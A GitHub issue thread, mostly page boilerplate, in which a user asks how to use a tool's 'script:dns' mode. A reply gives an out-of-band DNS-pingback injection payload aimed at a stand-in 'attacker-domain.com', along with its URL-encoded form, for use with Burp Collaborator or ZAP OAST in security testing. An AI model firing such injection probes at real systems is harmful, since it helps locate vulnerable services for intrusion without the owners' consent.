We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
How do you use it with script:dns?
script:dns
The text was updated successfully, but these errors were encountered:
For getting a DNS pingback you can use a payload like this: ${dns:attacker-domain.com}
${dns:attacker-domain.com}
You might have to url encode the payload, so the final payload will be like: %24%7Bdns%3Aattacker-domain.com%7D
%24%7Bdns%3Aattacker-domain.com%7D
You can try this using Burp collaborator or ZAP OAST. Does this answer your question?
Sorry, something went wrong.
No branches or pull requests
How do you use it with
script:dns
?The text was updated successfully, but these errors were encountered: